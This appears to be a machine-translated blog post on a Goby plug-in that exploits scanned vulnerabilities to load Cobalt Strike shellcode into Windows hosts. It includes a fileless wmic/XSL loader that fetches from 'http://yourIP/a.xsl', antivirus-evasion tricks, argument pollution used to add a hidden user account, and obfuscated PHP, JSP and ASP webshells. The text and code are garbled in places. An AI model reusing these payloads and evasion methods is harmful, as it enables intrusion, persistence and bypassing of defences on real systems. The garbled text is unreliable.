Goby can quickly and accurately scan assets and visually present them. At the same time, PoC&EXP has also increased a lot after the last EXP plan. After the actual vulnerability scanning, the use of high-risk vulnerabilities is not only on WHOAMI, but to enter the post-penetration stage. Then for Windows machines, online CS is an essential operation, which will make post-penetration like a fish in water. This plug-in only uses a simple way to use CS online, I hope the master can provide ideas and suggestions to improve it, there are detailed annotations in the source code, for the master to quickly understand.
0×01 plug-in
1.1 Plug-in Effect
1.2 Usage
1. On the toolbar, import the 32-bit RAW payload file of the CS (ATTACKS – > Packages – > Payload Generator – > Output: BIN for RAW) and add the unkilled file to the VPS.
2. Set the VPS no-kill file address in the Goby plug-in configuration, which can be changed in real time.
3. Click GoCS on the Exploit Details page
4. Select an utilization mode and file format and change the payload based on the actual situation to bypass interception
Click GO to send the package
Note: it is not possible to display this plug-in only on Windows machines, but you will need to judge for yourself.
0×02 plug-in development
2.1 Main Frame
├─ SRC │ ├─ SRC │ ├─ ├.png ├─ SRC │ ├─ SRC │ ├─ SRC │ ├─.png ├─ SRC │ ├─ SRC │ ├─ SRC │ ├─.png / images/CS │ └ ─ ─ assets / / layui │ └ ─ ─ the extension, js / / plug-in source │ └ ─ ─ Gopass. / / HTML toolbar made from killed XSL file │ └ ─ ─ GoCS. HTML ├─ package.json // Add-on Configuration List ├─ node_modules // Import modulesCopy the code2.2 Their grandparent package.json
Most of the work is done by the toolbar’s gopass.html and the vulnerability’s index.html, so I’ll start with a brief introduction to their grandparent package.json
2.3 Their dad extension.js
The specific comments are in the source code and can be found in the root directory \ Extensions after downloading GoCS in Goby. Let fs = require(‘ fs’); let fs = require(‘ fs’); Or add parent.
To jump out of gopass.html, click Command for GoPass:
Goby. registerCommand('GoPass',function(content){// Let path = __dirName + "/ gopass.html" // Open the subpage and configure the length and width goby.showIframeDia(path, "GoPass", "666", "500"); }) // End after clicking on the toolbar iconCopy the codeCode for sending packets and using EXP:
Class Gexp {constructor() {this.fs = require('fs'); This.request = require('request') this.path = require('path')} init() {this.host = this.data.server_host; this.port = this.data.server_port; this.username = this.data.authUsername; this.password = this.data.authPassword; } // getServerInfo() {let config_info = this.path.join(__dirname, '.. /.. /.. /config/config.json'); Parse (this.fs.readfilesync (config_info, 'UTF-8 ')); // Return this. Data; GetPOCInfo (vulname, proxystr) {this.init();} getPOCInfo(vulname, proxystr) {this.init(); Return new Promise((resolve, reject) => {this.request({url: `http://${this.host}:${this.port}/api/v1/getPOCInfo`, method: 'POST', auth: { 'user': this.username, 'pass': this.password, }, proxy: proxystr, json: { "vulname": Vulname}}, function (error, response, body) {// If (! Error && Response.statusCode == 200) {resolve(body); } else {// reject(error)}}); DebugExp (post_data, proxystr) {this.init(); Return new Promise((resolve, reject) => {this.request({url: `http://${this.host}:${this.port}/api/v1/debugExp`, method: 'POST', auth: { 'user': this.username, 'pass': this.password, }, proxy: proxystr, json: post_data }, function (error, response, body) { if (! Error && Response.statusCode == 200) {// Output the returned content // console.log(body); resolve(body); } else { reject(error) } }); })}} // Construct the Gexp class endCopy the code2.4 By themselves
2.4.1 Gopass.html is used to generate a kill free XSL file
The main purpose of this file is to splice the bin file with XSL file after base64 encryption to generate a gopass. XSL file for remote loading later.
Xsl file uses cactusTorch as loader to load shellcode, and wMIC is used to execute shellcode remotely without touching the ground. Because no file landing Trojan can be attached to any process inside the execution, and the traditional security software is based on file detection, the current no file landing Trojan check effect is poor, so the plug-in uses this form of online CS.
<! XSL <! XSL <! — > Comment symbol for simple no-kill bypass, where only basic kill software is bypassed.
This is also true for important function names.
Only static kill free is discussed here, and the effect on VT is as follows.
The effect is not good enough, add <! — > Like the P graph, the more P, the more… According to the bypass above, the exemption is as follows.
These several feel is the execution of the file, only a letter capitalized, the code can not execute they do not report poison, so the late also need to strengthen the no-kill.
2.4.2 index.html is used to generate CS for vulnerability exploitation
This file is mainly used to call the Gexp class in extension.js file, obtain PoC parameters and change them, then call EXP for package distribution. There are RCE and Upload methods, and the file forms are PHP, asp, JSP three kinds (aspX will be added later), there are specific annotations in the source code.
Parent must be added to the import module because it is a child page
let fs = parent.require('fs');
let goby = parent.goby;
Copy the codeAlso, if you use exec to call CMD and goby. exe, the generated file will be in the root directory of Goby, and the same goes for writing files without specifying a directory.
If you are writing javascript for the first time, notice that the dropdown box is not able to use the native event to listen for events. Instead, use layui syntax to select events.
Layui.use (['form'], function () {var form = layui.form; // Drop down box to change the event start //layui call writing, Form. on('select(vlul)') {// select(vlul); Function (data) {// Call the function to update the contents of the textarea changeE(); }); Form. on('select(TXT)', function (data) {// Call the function to update the contents of the textarea changeE(); }); // drop down box to change event end}); //select end of listening eventCopy the codeTake PHP as an example, the exploit of upload is to upload and write PHP code, execute CMD call wmic, remotely load and run shellcode, RCE is to execute system DOS commands by default. Call WMIC for remote loading and run shellCode (in case of code execution vulnerability, you also need to add CMD functions like system())
Wmic OS get /format: “http://yourIP/a.xsl”
Don’t want to, it will certainly be blocked by a bucket, so we have to bypass the interception, so use used rotten echo and pipeline operator | to try
Echo OS get/format: “http://yourIP/a.xsl” | wmic
Local CMD execution will not be blocked, but Upload will be blocked when writing to the page and then loading the page. No surprise. But the interesting thing here is that it is actually bypassed but not completely bypassed. According to the fact that advanced ingredients often need to be simply cooked, I decided to cook it simply, write it into bat file and execute it locally, and finally found that a whole family of buckets had no interception. So instead of calling wMIC in the page, write it to bat and execute wMIC locally so it won’t be intercepted.
So the last command to echo ^ echo OS get/format: “http://yourIP/a.xsl” ^ | wmic > > 1. Bat && 1. Bat
And finally, let’s see what shellcode looks like when it’s executed on the fly, under the supervision of a sky, a bucket, a butler, and a pile.
After six seconds of no response, I thought I was killed by some sky, but I didn’t. If you perform sensitive operations, such as creating a user, you can consider polluting the argue parameter.
Using a reference www.freesion.com/article/334…
Parameter pollution NET
argue net xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Copy the codeView pollution parameters
argue
Copy the codePerforming sensitive operations with contaminated NET
execute net user test2 root123 /add
Copy the codeThe whole family barrel was not intercepted
The principle is simply as P diagram, the original implementation of NET, but after the contamination command is net XXXXXXXXXX, to bypass.
You are bound to run into some minor issues, such as wmic loading a port that is not open
The best solution is to leave it alone and wait a minute for it to exit. This tells us one thing, be sure to go to the firewall Settings inside the open port.
After the CMD command bypass, start the upload Webshell bypass.
Php is a Php statement that makes use of the ice Scorpion callback function.
let phpshell = "<? php @call_user_func(base64_decode("c3lzdGVta"),"" + wmicCMDshell + "");"Copy the codeTk /posts/websh is a reference to yzddMr6. The article
let jspshell = "<%@ page contentType="text/html; charset=UTF-8" import="javax.xml.bind.DatatypeConverter" language="java" %><%Class rt = Class.forName(new String(DatatypeConverter.parseHexBinary("6a6176612e6c616e672e52756e74696d65"))); Process e = (Process) rt.getMethod(new String(DatatypeConverter.parseHexBinary("65786563")), String.class).invoke(rt.getMethod(new String(DatatypeConverter.parseHexBinary("67657452756e74696d65"))).invoke(null), "" + wmicCMDshell + ""); % > ";Copy the codeAsp is a simple use of CHR characters to increase writing, can not avoid killing, hope Asp master can guide.
let aspshell = "<%response.write server.createobject("wscript.sh"&Chr(69)&"ll").ExEc("" + wmicAsp +"").stdout.readall%>"
Copy the code
0 x 3 summary
Write plug-in and write JS file for the first time, no doubt is a baidu oriented programming, overall or good, learned a lot. Unfortunately, ASP is not free to kill, but also hope asp master guidance. This version is very basic and easy to use, so it can only be used in simple environments. Hopefully, more elements will be added later to make the plug-in suitable for more complex environments.
There is a need for relevant learning materials can pay attention to private letter I oh!!